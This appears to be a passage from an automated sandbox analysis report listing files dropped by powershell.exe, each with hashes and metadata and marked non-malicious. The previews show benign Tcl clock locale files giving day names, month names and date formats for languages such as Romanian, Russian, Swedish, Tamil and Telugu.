                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ro DAYS_OF_WEEK_ABBREV [list \.. "D"\.. "L"\.. "Ma"\.. "Mi"\.. "J"\.. "V"\.. "S"].. ::msgcat::mcset ro DAYS_OF_WEEK_FULL [list \.. "duminic\u0103"\.. "luni"\.. "mar\u0163i"\.. "miercuri"\.. "joi"\.. "vineri"\.. "s\u00eemb\u0103t\u0103"].. ::msgcat::mcset ro MONTHS_ABBREV [list \.. "Ian"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mai"\.. "Iun"\.. "Iul"\.. "Aug"\.. "Sep"\.. "Oct"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset ro MONTHS_FULL [list \.. "ianuarie"\.. "februarie"\.. "martie"\.. "aprilie"\.. "mai"\.. "iunie"\.. "iulie"\.. "august"\.. "septembrie"\.. "octombrie"\.. "noiembrie"\.. "decembrie"\.. ""].. ::msgcat:
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2091
                                                                                                                                                                                                                              Entropy (8bit):4.2886524607041006
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43D+pQ7keidQfRQPgQHB81Z/sFIAZSQWQXQrQxJQjQRnQBFQiWftkWt:26pgkeoSnpjA4tMYiJcCMFmVRt
                                                                                                                                                                                                                              MD5:9F1C8DD58550558977821FD500E7C0E0
                                                                                                                                                                                                                              SHA1:EFDD809BC2872A5BE0E353D31BE6D7D72E4B829C
                                                                                                                                                                                                                              SHA-256:BB35BB6F07BAEF72C329EC3E95D6527A2736070EE2FFE5DE227E1FF0332390F8
                                                                                                                                                                                                                              SHA-512:AA3C5C40AE9D342F8287958355C3321CF60566AD3E84E3D18D782FC022A998DA275506A61010A65D2E7D7578F2919C47C63AB0BA63A38800AA48D4B88ACE54D3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ru DAYS_OF_WEEK_ABBREV [list \.. "\u0412\u0441"\.. "\u041f\u043d"\.. "\u0412\u0442"\.. "\u0421\u0440"\.. "\u0427\u0442"\.. "\u041f\u0442"\.. "\u0421\u0431"].. ::msgcat::mcset ru DAYS_OF_WEEK_FULL [list \.. "\u0432\u043e\u0441\u043a\u0440\u0435\u0441\u0435\u043d\u044c\u0435"\.. "\u043f\u043e\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u0438\u043a"\.. "\u0432\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0441\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0435\u0440\u0433"\.. "\u043f\u044f\u0442\u043d\u0438\u0446\u0430"\.. "\u0441\u0443\u0431\u0431\u043e\u0442\u0430"].. ::msgcat::mcset ru MONTHS_ABBREV [list \.. "\u044f\u043d\u0432"\.. "\u0444\u0435\u0432"\.. "\u043c\u0430\u0440"\.. "\u0430\u043f\u0440"\.. "\u043c\u0430\u0439"\.. "\u0438\u044e\u
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):248
                                                                                                                                                                                                                              Entropy (8bit):4.9420431225061
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoVAgWIZoVY9X3vtfNrsoVA9+3vW6Q9vn:4EnLB383SFWIyaX3vtNl/3vWHNn
                                                                                                                                                                                                                              MD5:DC98D88964650E302BE97FDB3B33326E
                                                                                                                                                                                                                              SHA1:1DDDCC4265D7B980B867FEE674BEF2FD87D823F7
                                                                                                                                                                                                                              SHA-256:13E4E79A0ED82034BADE0CFF8DEF5DE1222F6968108AD710662BDB7DAF36D7E1
                                                                                                                                                                                                                              SHA-512:F3B9D528C529DD520FEDA3C20ED354E521C5B3C29F3317E15B7939CE06A3D67554D34DD6E54FE038585E46C560C604A1FD7E7F84914086B5994D52CE2C9E99CE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ru_UA DATE_FORMAT "%d.%m.%Y".. ::msgcat::mcset ru_UA TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset ru_UA DATE_TIME_FORMAT "%d.%m.%Y %k:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1212
                                                                                                                                                                                                                              Entropy (8bit):4.359036493565628
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83/YIXo4YY0dD6kMm7fX2NaSIvZdHZgHZ/IxvaGWxvtl9svWTN:43rLTR44/yWltOWB
                                                                                                                                                                                                                              MD5:E297221FA73BD78577B398BC7D061D21
                                                                                                                                                                                                                              SHA1:F2A6B456272F913A9E97C495CEE73AC774C90FA1
                                                                                                                                                                                                                              SHA-256:E65D6E5E837DF0A2DF0DB77BCE45334BBC27EFFF9023C37119E75D49932D9D6C
                                                                                                                                                                                                                              SHA-512:AB9DDAE7CB21193C7753041F0B88CF2D40987E7E604B47816219458D217F084AA4EBF36719E22AAB3FD71A271D9F956ADC353182991903D7ADE8C8F00F6B2F9B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sh DAYS_OF_WEEK_ABBREV [list \.. "Ned"\.. "Pon"\.. "Uto"\.. "Sre"\.. "\u010cet"\.. "Pet"\.. "Sub"].. ::msgcat::mcset sh DAYS_OF_WEEK_FULL [list \.. "Nedelja"\.. "Ponedeljak"\.. "Utorak"\.. "Sreda"\.. "\u010cetvrtak"\.. "Petak"\.. "Subota"].. ::msgcat::mcset sh MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Maj"\.. "Jun"\.. "Jul"\.. "Avg"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset sh MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "Mart"\.. "April"\.. "Maj"\.. "Juni"\.. "Juli"\.. "Avgust"\.. "Septembar"\.. "Oktobar"\.. "Novembar"\.. "Decembar"\.. ""].. ::msgcat::mcset sh BC
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1255
                                                                                                                                                                                                                              Entropy (8bit):4.4043119723436135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83c46o40u3rIsmJIcm93ApLDVb2IcU95WFGEXF3eUCvtz/v3e6:43c3ow3rF93Ap7tEXFREtznp
                                                                                                                                                                                                                              MD5:24DA40901D907D35195CC1B3A675EBC7
                                                                                                                                                                                                                              SHA1:8AF31248F06FADA5CFB0D83A940CFF5CE70E2577
                                                                                                                                                                                                                              SHA-256:976813F6C53C9BEBBF976B0F560FD7FC5E4EC4C574D7E1CD31F9A4056765CB7A
                                                                                                                                                                                                                              SHA-512:A9BC6AAFE9AEEDFD1E483E54A2D27871A09ADD6807D8F90410CD2BB82A91BA9DF435652EC9A7C3AD0A080D7F153CA848BB47DAD3936BA30E4AEFF3C474C433CC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sk DAYS_OF_WEEK_ABBREV [list \.. "Ne"\.. "Po"\.. "Ut"\.. "St"\.. "\u0160t"\.. "Pa"\.. "So"].. ::msgcat::mcset sk DAYS_OF_WEEK_FULL [list \.. "Nede\u013ee"\.. "Pondelok"\.. "Utorok"\.. "Streda"\.. "\u0160tvrtok"\.. "Piatok"\.. "Sobota"].. ::msgcat::mcset sk MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "m\u00e1j"\.. "j\u00fan"\.. "j\u00fal"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sk MONTHS_FULL [list \.. "janu\u00e1r"\.. "febru\u00e1r"\.. "marec"\.. "apr\u00edl"\.. "m\u00e1j"\.. "j\u00fan"\.. "j\u00fal"\.. "august"\.. "september"\.. "okt\u00f3ber"\.. "november"\.. "decem
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                                                                              Entropy (8bit):4.333705818952628
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83MIXpC9opYuGS/BrIsmZ5hv1yAxyIVjd392WFThENvt0vJoO:43fXYujZrqyApYJtyR
                                                                                                                                                                                                                              MD5:CB76F54CBE0D1AAE8BA956B4C51CBD2A
                                                                                                                                                                                                                              SHA1:C1F78375EDB0BD2504553E33B2024C0C63FDB1B2
                                                                                                                                                                                                                              SHA-256:11A6264676DBED87E4F718075127E32E107854F35F141642454F484984084486
                                                                                                                                                                                                                              SHA-512:69964348FF08DE6EEB5E3DD61057FF0DF5441105EB7BEE7FB7E9AC5E26DCC164E3C7C011CA5CD7BC5B97A7872532331C97CCBC80563F6C5A3548014BFA8BEF16
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sl DAYS_OF_WEEK_ABBREV [list \.. "Ned"\.. "Pon"\.. "Tor"\.. "Sre"\.. "\u010cet"\.. "Pet"\.. "Sob"].. ::msgcat::mcset sl DAYS_OF_WEEK_FULL [list \.. "Nedelja"\.. "Ponedeljek"\.. "Torek"\.. "Sreda"\.. "\u010cetrtek"\.. "Petek"\.. "Sobota"].. ::msgcat::mcset sl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "avg"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sl MONTHS_FULL [list \.. "januar"\.. "februar"\.. "marec"\.. "april"\.. "maj"\.. "junij"\.. "julij"\.. "avgust"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset sl B
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1321
                                                                                                                                                                                                                              Entropy (8bit):4.408176575111904
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83F7ONQEwXwjjTlVoSEh76W/X+WZQJ4hv+H6v2V:43NwjPEwl4VQ8q
                                                                                                                                                                                                                              MD5:E606F620F03EC0FBDBE6551601299C5F
                                                                                                                                                                                                                              SHA1:0B50AB679E8D90D8E7319BCADAC426E004594D3B
                                                                                                                                                                                                                              SHA-256:1F4EFD78F6B45B65F73F09B2F52FC13C2A7C4138DCB7664804878D197B6EBDF9
                                                                                                                                                                                                                              SHA-512:08AF2B51EB7111E334ADDA3A03F9A8816C104E9742B523EC363FB5131A3DF73D298A8DDCD573D23C23C65CCFD2B8898DF75AE3D4F04BF80744044FB6BAB5EC0A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sq DAYS_OF_WEEK_ABBREV [list \.. "Die"\.. "H\u00ebn"\.. "Mar"\.. "M\u00ebr"\.. "Enj"\.. "Pre"\.. "Sht"].. ::msgcat::mcset sq DAYS_OF_WEEK_FULL [list \.. "e diel"\.. "e h\u00ebn\u00eb"\.. "e mart\u00eb"\.. "e m\u00ebrkur\u00eb"\.. "e enjte"\.. "e premte"\.. "e shtun\u00eb"].. ::msgcat::mcset sq MONTHS_ABBREV [list \.. "Jan"\.. "Shk"\.. "Mar"\.. "Pri"\.. "Maj"\.. "Qer"\.. "Kor"\.. "Gsh"\.. "Sht"\.. "Tet"\.. "N\u00ebn"\.. "Dhj"\.. ""].. ::msgcat::mcset sq MONTHS_FULL [list \.. "janar"\.. "shkurt"\.. "mars"\.. "prill"\.. "maj"\.. "qershor"\.. "korrik"\.. "gusht"\.. "shtator"\.. "tetor"\.. "n\u00ebntor"\.. "dhjetor"\.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2087
                                                                                                                                                                                                                              Entropy (8bit):4.307749748884122
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43ilQTSBQrQP9QenzMKSFD9NI/QiNQEQrQL1KKYjU5rtAx:2I5EyLMKSFZNIYMzYMKKiqW
                                                                                                                                                                                                                              MD5:BF363AB60B57F6D8FDCDBFD230A28DDF
                                                                                                                                                                                                                              SHA1:6375CBA0A2197DA7E65BEE45C42F02C4F0B9142D
                                                                                                                                                                                                                              SHA-256:FA00A7B22C9941F6C2B893F22B703DCB159CA2F2E4005FD6A74A632AEB786BFA
                                                                                                                                                                                                                              SHA-512:91AD8085EF321A5A0E4D2ED204940CB66E8E230BBEDE59A8A07D1CEED9155FCC6B075A1FCC44AE834C1FEEEB3A59256C4310684C5AC453D4C50DFABD88469814
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sr DAYS_OF_WEEK_ABBREV [list \.. "\u041d\u0435\u0434"\.. "\u041f\u043e\u043d"\.. "\u0423\u0442\u043e"\.. "\u0421\u0440\u0435"\.. "\u0427\u0435\u0442"\.. "\u041f\u0435\u0442"\.. "\u0421\u0443\u0431"].. ::msgcat::mcset sr DAYS_OF_WEEK_FULL [list \.. "\u041d\u0435\u0434\u0435\u0459\u0430"\.. "\u041f\u043e\u043d\u0435\u0434\u0435\u0459\u0430\u043a"\.. "\u0423\u0442\u043e\u0440\u0430\u043a"\.. "\u0421\u0440\u0435\u0434\u0430"\.. "\u0427\u0435\u0442\u0432\u0440\u0442\u0430\u043a"\.. "\u041f\u0435\u0442\u0430\u043a"\.. "\u0421\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset sr MONTHS_ABBREV [list \.. "\u0408\u0430\u043d"\.. "\u0424\u0435\u0431"\.. "\u041c\u0430\u0440"\.. "\u0410\u043f\u0440"\.. "\u041c\u0430\u0458"\.. "\u0408\u0443\u043d"\.. "\
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1219
                                                                                                                                                                                                                              Entropy (8bit):4.3542418837714285
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83qoLt6yLQoAusrIsmZ5m4AcjTHX92WFfjr4MvBvX:43ZLxQNusrr4Aw3Jkq1X
                                                                                                                                                                                                                              MD5:3B5C3FFA0829768470BDA1B46D882060
                                                                                                                                                                                                                              SHA1:C96799036EC5CCDE799A6B50CD7748908935A2F3
                                                                                                                                                                                                                              SHA-256:483916B51BD7E071E88F9EC36AAF3E08FEA823991532F832DE491C6C40B55A9F
                                                                                                                                                                                                                              SHA-512:684FA249123878AA7F856DF0FD3B0D9F041113CFEA8EEFA47D0E1948DA23694330BF0D62BA896A3891CD559C16CAE9330BF31508F530AC003D2929D5FD9246D8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sv DAYS_OF_WEEK_ABBREV [list \.. "s\u00f6"\.. "m\u00e5"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f6"].. ::msgcat::mcset sv DAYS_OF_WEEK_FULL [list \.. "s\u00f6ndag"\.. "m\u00e5ndag"\.. "tisdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f6rdag"].. ::msgcat::mcset sv MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sv MONTHS_FULL [list \.. "januari"\.. "februari"\.. "mars"\.. "april"\.. "maj"\.. "juni"\.. "juli"\.. "augusti"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat:
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1040
                                                                                                                                                                                                                              Entropy (8bit):4.108744949579904
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383A4mScvhkzoR4mtuWckRkoay3UVxMmALfG7IdzVJ633xRCPLMYMvYo76u:4aR83/Shkz1uckO76kMmEf62qOTdMvvn
                                                                                                                                                                                                                              MD5:5774860C8AEECBD48F1502E616158CAB
                                                                                                                                                                                                                              SHA1:DE7059713EA7913A0C79F5386833CE2BCAD2CFD7
                                                                                                                                                                                                                              SHA-256:1DA068C9AA02EF14A2440758C6040D632D96044A20EC501DBB9E40D8592E0E7F
                                                                                                                                                                                                                              SHA-512:91E69222DDF55E9E0E389DB77D7A0F2E082351DC3FB34A1A2C1E350E4187E8BB940F6C2EDE1B8651159C2787AA0BE4D7268F33F7A82CAED03514FCE462530408
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sw DAYS_OF_WEEK_ABBREV [list \.. "Jpi"\.. "Jtt"\.. "Jnn"\.. "Jtn"\.. "Alh"\.. "Iju"\.. "Jmo"].. ::msgcat::mcset sw DAYS_OF_WEEK_FULL [list \.. "Jumapili"\.. "Jumatatu"\.. "Jumanne"\.. "Jumatano"\.. "Alhamisi"\.. "Ijumaa"\.. "Jumamosi"].. ::msgcat::mcset sw MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Ago"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset sw MONTHS_FULL [list \.. "Januari"\.. "Februari"\.. "Machi"\.. "Aprili"\.. "Mei"\.. "Juni"\.. "Julai"\.. "Agosti"\.. "Septemba"\.. "Oktoba"\.. "Novemba"\.. "Desemba"\.. ""].. ::msgcat::mcset sw BCE "
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1874
                                                                                                                                                                                                                              Entropy (8bit):4.080580566597515
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83AI0xnJdnQhmHlHYPKtul+eOPfIxyH5ztUSLu8tptLtrl+eOPfIxyH5ztUSU:43N0dQmHlHYPKtu1HxMtr1Hx/
                                                                                                                                                                                                                              MD5:85288236C3997302EA26D7403BBA2C15
                                                                                                                                                                                                                              SHA1:05AB389CC4DCF17B37BFF6ED1ECD58D6E9850A01
                                                                                                                                                                                                                              SHA-256:AEFDC4255890D5B3FFE5CEE1B457B7D711283C2287ABA644155C10956012F6C1
                                                                                                                                                                                                                              SHA-512:8E389D46606176EE14B8356153095B49C9426B80139B672A620F488891F091D1A272D4FB116775900E4AB4EC84DDDEBD8D6AF81AC672F14F148F2BFC638D2B10
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ta DAYS_OF_WEEK_FULL [list \.. "\u0b9e\u0bbe\u0baf\u0bbf\u0bb1\u0bc1"\.. "\u0ba4\u0bbf\u0b99\u0bcd\u0b95\u0bb3\u0bcd"\.. "\u0b9a\u0bc6\u0bb5\u0bcd\u0bb5\u0bbe\u0baf\u0bcd"\.. "\u0baa\u0bc1\u0ba4\u0ba9\u0bcd"\.. "\u0bb5\u0bbf\u0baf\u0bbe\u0bb4\u0ba9\u0bcd"\.. "\u0bb5\u0bc6\u0bb3\u0bcd\u0bb3\u0bbf"\.. "\u0b9a\u0ba9\u0bbf"].. ::msgcat::mcset ta MONTHS_ABBREV [list \.. "\u0b9c\u0ba9\u0bb5\u0bb0\u0bbf"\.. "\u0baa\u0bc6\u0baa\u0bcd\u0bb0\u0bb5\u0bb0\u0bbf"\.. "\u0bae\u0bbe\u0bb0\u0bcd\u0b9a\u0bcd"\.. "\u0b8f\u0baa\u0bcd\u0bb0\u0bb2\u0bcd"\.. "\u0bae\u0bc7"\.. "\u0b9c\u0bc2\u0ba9\u0bcd"\.. "\u0b9c\u0bc2\u0bb2\u0bc8"\.. "\u0b86\u0b95\u0bb8\u0bcd\u0b9f\u0bcd"\.. "\u0b9a\u0bc6\u0baa\u0bcd\u0b9f\u0bae\u0bcd\u0baa\u0bb0\u0bcd"\.. "\u0b85\u0b95\u0bcd\u0b9f\u0bcb\u0baa\u0bb0\u0bcd"\.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.863003494480733
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xosDv+IZosK3v6ry/5osDo+3v+6f6HyFvn:4EnLB383ZDvl5K3v6ry/ZDF3vmSVn
                                                                                                                                                                                                                              MD5:CF078352DA0507C767F04E31D6C14296
                                                                                                                                                                                                                              SHA1:0A9B1255BD85B60D3620AE61370F54748AB7A182
                                                                                                                                                                                                                              SHA-256:4978A193076DE56944236F7F1DCECACFF739536DFB3DBEFC1F7FE2B97A8AEAF4
                                                                                                                                                                                                                              SHA-512:6FFC85B2A8DECB373EC76B1CD1A9459A30E443319F2C8DB9BBE6E115F5EFEEBAC314D4E8BE996EA55EE46466C6F6057A73078F5FDCF1C4CBAF1A270E45BC10C0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ta_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset ta_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset ta_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2149
                                                                                                                                                                                                                              Entropy (8bit):4.097884113767283
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43a8mxI9k3JR0UjjFbPcniLHVktjjFbPcniLHVM:2a8v9k3JdbPcIidbPcIG
                                                                                                                                                                                                                              MD5:61E4CB2AAD66285E9113071057F39C35
                                                                                                                                                                                                                              SHA1:A2BD21090859669C4B6A875E077825381B7E2702
                                                                                                                                                                                                                              SHA-256:9E96C7123100234A7018533764502985A208F2EB3314F5B6332D46016725A63F
                                                                                                                                                                                                                              SHA-512:589A2D65508B07B5FDEDA883F71A4B496B25458CA1ECE7C4D4F5DAE82EB683DA82C8E21E57D63A235AB600174C9D362A746B2E27BAA6E3ADE1B7BD9D6000BE27
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset te DAYS_OF_WEEK_ABBREV [list \.. "\u0c06\u0c26\u0c3f"\.. "\u0c38\u0c4b\u0c2e"\.. "\u0c2e\u0c02\u0c17\u0c33"\.. "\u0c2c\u0c41\u0c27"\.. "\u0c17\u0c41\u0c30\u0c41"\.. "\u0c36\u0c41\u0c15\u0c4d\u0c30"\.. "\u0c36\u0c28\u0c3f"].. ::msgcat::mcset te DAYS_OF_WEEK_FULL [list \.. "\u0c06\u0c26\u0c3f\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c38\u0c4b\u0c2e\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c2e\u0c02\u0c17\u0c33\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c2c\u0c41\u0c27\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c17\u0c41\u0c30\u0c41\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c36\u0c41\u0c15\u0c4d\u0c30\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c36\u0c28\u0c3f\u0c35\u0c3e\u0c30\u0c02"].. ::msgcat::mcset te MONTHS_ABBREV [list \.. "\u0c1c\u0c28\u0c35\u0c30\u0c3f"\.. "\u0c2b\u0c3f\u0c2c\u0c4d\u0c30\u0c35\u0c30\u0c3f"\.. "\u0c2e\u0c3
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):419
                                                                                                                                                                                                                              Entropy (8bit):5.058324650031252
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383LjZWsn0sHjoD0savzda3v6ry/ZF3vMSVn:4aR833Z1nnHjoDnavzd8vSCZNvMSV
                                                                                                                                                                                                                              MD5:BCA040A356E7E8CC597EFB9B9065F8E1
                                                                                                                                                                                                                              SHA1:ADAF7EC8C2035BC06E168D3F1BD7F39277E9273F
                                                                                                                                                                                                                              SHA-256:B110FEEDDA21ECCEFA624BEF8E1476E9F221FB253880AC370967AE4D0237CA7A
                                                                                                                                                                                                                              SHA-512:D408ECE8CF89FB23B45420D3CBA7655EEE713498210889A84EE25D3417360705546D97028EAAAA47764B6E9B0A3699669B98C0A53861A38E0DFCB9F3B8A47BEC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset te_IN AM "\u0c2a\u0c42\u0c30\u0c4d\u0c35\u0c3e\u0c39\u0c4d\u0c28".. ::msgcat::mcset te_IN PM "\u0c05\u0c2a\u0c30\u0c3e\u0c39\u0c4d\u0c28".. ::msgcat::mcset te_IN DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset te_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset te_IN DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2359
                                                                                                                                                                                                                              Entropy (8bit):4.382796122808316
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:439X4QKPQJecQwFA0P9JmDsxQ7KHfWkD2CQM0DnWxFDzCYmdrtVP:29ohCi1028QmHfIC4jW3DmHB
                                                                                                                                                                                                                              MD5:7F61E1EA256D78948189EF07119663CD
                                                                                                                                                                                                                              SHA1:6867E9780049FACE9984B7788B6F362B8D1AD718
                                                                                                                                                                                                                              SHA-256:48BEAF693BF5B6EED15234DB0D375B97E6D576A749E9048420C153E6CAFC0259
                                                                                                                                                                                                                              SHA-512:F3E24E0B41A7D722AC2FA0E429A2DCB1CCB5BAECC9912ADF6AF79C51366EA1AC9F931F0F44F068F3CEE6873516E6223CC5E7616CF523B1DFB9E528DE4D58454A
                                                                                                                                                                                                                              Malicious:false
